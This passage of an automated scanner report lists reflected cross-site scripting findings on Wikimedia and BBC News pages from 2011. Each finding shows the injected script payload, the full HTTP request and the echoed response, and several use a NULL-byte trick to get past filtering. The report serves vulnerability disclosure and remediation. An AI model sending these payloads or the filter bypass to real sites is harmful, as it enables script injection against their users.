Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a37b"><script>alert(1)</script>5922412b493 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /w/index.php5a37b"><script>alert(1)</script>5922412b493?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400 HTTP/1.1
Host: meta.wikimedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:11 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/w/index.php5a37b"><script>alert(1)</script>5922412b493?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400
Content-Length: 6020
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq65.wikimedia.org
X-Cache-Lookup: MISS from sq65.wikimedia.org:3128
X-Cache: MISS from sq63.wikimedia.org
X-Cache-Lookup: MISS from sq63.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/w/index.php5a37b&quot;
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/index.php5a37b"><script>alert(1)</script>5922412b493?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400" title="Wikipedia:index.php5a37b">
...[SNIP]...

5.30. http://meta.wikimedia.org/w/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4f9d<script>alert(1)</script>4ff91371275 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /w/index.phpa4f9d<script>alert(1)</script>4ff91371275?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400 HTTP/1.1
Host: meta.wikimedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:11 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/w/index.phpa4f9d<script>alert(1)</script>4ff91371275?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400
Content-Length: 5992
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq62.wikimedia.org
X-Cache-Lookup: MISS from sq62.wikimedia.org:3128
X-Cache: MISS from sq65.wikimedia.org
X-Cache-Lookup: MISS from sq65.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/w/index.phpa4f9d&lt;sc
...[SNIP]...
<p style="font-weight: bold;">To check for "index.phpa4f9d<script>alert(1)</script>4ff91371275?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/index.phpa4f9d<script>
...[SNIP]...

5.31. http://meta.wikimedia.org/w/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %002cbbc<script>alert(1)</script>bc850f7368e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cbbc<script>alert(1)</script>bc850f7368e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /w/index.php/%002cbbc<script>alert(1)</script>bc850f7368e HTTP/1.1
Host: meta.wikimedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:24:11 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/w/index.php/%002cbbc<script>alert(1)</script>bc850f7368e
Content-Length: 5426
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:3128
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: MISS from sq66.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/w/index.php/%002cbbc&l
...[SNIP]...
<p style="font-weight: bold;">To check for "index.php/%002cbbc<script>alert(1)</script>bc850f7368e" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/index.php/%002cbbc<script>
...[SNIP]...

5.32. http://meta.wikimedia.org/w/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0018fb0"><script>alert(1)</script>a01da2cb18a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18fb0"><script>alert(1)</script>a01da2cb18a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /w/index.php/%0018fb0"><script>alert(1)</script>a01da2cb18a HTTP/1.1
Host: meta.wikimedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:24:06 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/w/index.php/%0018fb0"><script>alert(1)</script>a01da2cb18a
Content-Length: 5454
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/w/index.php/%0018fb0&q
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/index.php/%0018fb0"><script>alert(1)</script>a01da2cb18a" title="Wikipedia:index.php/%0018fb0">
...[SNIP]...

5.33. http://meta.wikimedia.org/wiki/List_of_Wikipedias [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /wiki/List_of_Wikipedias

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e045f"><script>alert(1)</script>75f828803d9 was submitted in the REST URL parameter 2. This input was echoed as e045f"><script>alert(1)</script>75f828803d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_Wikipedias%00e045f"><script>alert(1)</script>75f828803d9 HTTP/1.1
Host: meta.wikimedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:25:28 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/wiki/List_of_Wikipedias%00e045f"><script>alert(1)</script>75f828803d9
Content-Length: 5508
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:3128
X-Cache: MISS from sq36.wikimedia.org
X-Cache-Lookup: MISS from sq36.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/wiki/List_of_Wikipedia
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/List_of_Wikipedias%00e045f"><script>alert(1)</script>75f828803d9" title="Wikipedia:List_of_Wikipedias%00e045f">
...[SNIP]...

5.34. http://meta.wikimedia.org/wiki/List_of_Wikipedias [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /wiki/List_of_Wikipedias

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00dc82e<script>alert(1)</script>e4b8fb65c24 was submitted in the REST URL parameter 2. This input was echoed as dc82e<script>alert(1)</script>e4b8fb65c24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_Wikipedias%00dc82e<script>alert(1)</script>e4b8fb65c24 HTTP/1.1
Host: meta.wikimedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:25:35 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/wiki/List_of_Wikipedias%00dc82e<script>alert(1)</script>e4b8fb65c24
Content-Length: 5480
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:3128
X-Cache: MISS from sq64.wikimedia.org
X-Cache-Lookup: MISS from sq64.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/wiki/List_of_Wikipedia
...[SNIP]...
<p style="font-weight: bold;">To check for "List_of_Wikipedias%00dc82e<script>alert(1)</script>e4b8fb65c24" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/List_of_Wikipedias%00dc82e<script>
...[SNIP]...

5.35. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59ef1'-alert(1)-'84cf7884828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /earth/hi/earth_news/newsid_9469000/9469456.stm?59ef1'-alert(1)-'84cf7884828=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:37 GMT
Keep-Alive: timeout=10, max=786
Expires: Tue, 03 May 2011 13:24:37 GMT
Connection: close
Set-Cookie: BBC-UID=44fd0cb030b221e54da0c02661411f4e663f7b7050f0b11a14cb5a96e76457080Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44fd0cb030b221e54da0c02661411f4e663f7b7050f0b11a14cb5a96e76457080Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43834

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429077000,
       editionToServe: null,
       queryString: '59ef1'-alert(1)-'84cf7884828=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'earthnews',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/earth/hi/earth_news/
...[SNIP]...

5.36. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee1a8'-alert(1)-'9703267ab0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm?ee1a8'-alert(1)-'9703267ab0=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:40 GMT
Keep-Alive: timeout=10, max=797
Expires: Tue, 03 May 2011 13:24:40 GMT
Connection: close
Set-Cookie: BBC-UID=64ed5c6020d231882e64af02f1db9b6589d6a5cca0c0915a142bfa057381fa2a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64ed5c6020d231882e64af02f1db9b6589d6a5cca0c0915a142bfa057381fa2a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43832

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429080000,
       editionToServe: null,
       queryString: 'ee1a8'-alert(1)-'9703267ab0=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'earthnews',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/earth/hi/earth_news/
...[SNIP]...

5.37. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cricket/13264093.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16e40'-alert(1)-'1b4f1bf80bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cricket/13264093.stm?16e40'-alert(1)-'1b4f1bf80bf=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:43 GMT
Keep-Alive: timeout=10, max=771
Expires: Tue, 03 May 2011 13:24:43 GMT
Connection: close
Set-Cookie: BBC-UID=a44d7cd000f2010b23733c72b1a794247b8ede2a902041ead40baa55cd8086940Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a44d7cd000f2010b23733c72b1a794247b8ede2a902041ead40baa55cd8086940Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 49205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429083000,
       editionToServe: 'international',
       queryString: '16e40'-alert(1)-'1b4f1bf80bf=1',
       referrer: null,
       section: 'sri-lanka',
       sectionPath: '/cricket',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13264093',
       assetType: 'story',
   
...[SNIP]...

5.38. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/13265403.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e3ac'-alert(1)-'eec7239bc49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/13265403.stm?7e3ac'-alert(1)-'eec7239bc49=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:42 GMT
Keep-Alive: timeout=10, max=783
Expires: Tue, 03 May 2011 13:24:42 GMT
Connection: close
Set-Cookie: BBC-UID=64bd0c2010f2f10a6d93cb46918206752853044a3010e13a24ab9a956ff1bcd60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:42 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bd0c2010f2f10a6d93cb46918206752853044a3010e13a24ab9a956ff1bcd60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:42 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429082000,
       editionToServe: 'international',
       queryString: '7e3ac'-alert(1)-'eec7239bc49=1',
       referrer: null,
       section: 'europe',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13265403',
       assetType: 'story',
       u
...[SNIP]...

5.39. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35755'-alert(1)-'f04cde5ea9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm?35755'-alert(1)-'f04cde5ea9f=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:42 GMT
Keep-Alive: timeout=10, max=795
Expires: Tue, 03 May 2011 13:24:42 GMT
Connection: close
Set-Cookie: BBC-UID=146d7ce02062b1ea8e751031318b472bee611b21804031ca746bcac57311aa6a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:42 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=146d7ce02062b1ea8e751031318b472bee611b21804031ca746bcac57311aa6a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:42 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429082000,
       editionToServe: 'international',
       queryString: '35755'-alert(1)-'f04cde5ea9f=1',
       referrer: null,
       section: 'formula-one',
       sectionPath: '/formula_one',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13267766',
       assetType: 'stor
...[SNIP]...

5.40. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/13264093.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a57e1'-alert(1)-'54cf4a03b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cricket/13264093.stm?a57e1'-alert(1)-'54cf4a03b73=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:37 GMT
Keep-Alive: timeout=10, max=800
Expires: Tue, 03 May 2011 13:24:37 GMT
Connection: close
Set-Cookie: BBC-UID=a45d6ca0e04231e54d51620191e1b35da4f7f9aea0a0f1e91bfb23af3105f77a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a45d6ca0e04231e54d51620191e1b35da4f7f9aea0a0f1e91bfb23af3105f77a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 50106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429077000,
       editionToServe: 'international',
       queryString: 'a57e1'-alert(1)-'54cf4a03b73=1',
       referrer: null,
       section: 'sri-lanka',
       sectionPath: '/cricket',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13264093',
       assetType: 'story',
   
...[SNIP]...

5.41. http://news.bbc.co.uk/sport2/hi/football/13265403.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/13265403.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c5d5'-alert(1)-'7c4d8b95eda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/13265403.stm?4c5d5'-alert(1)-'7c4d8b95eda=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:37 GMT
Keep-Alive: timeout=10, max=793
Expires: Tue, 03 May 2011 13:24:37 GMT
Connection: close
Set-Cookie: BBC-UID=44bd5c10a0a2b1a56e3ad0e501d37cc65546d17290b0f1bae4eb2ae4f00c46420Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
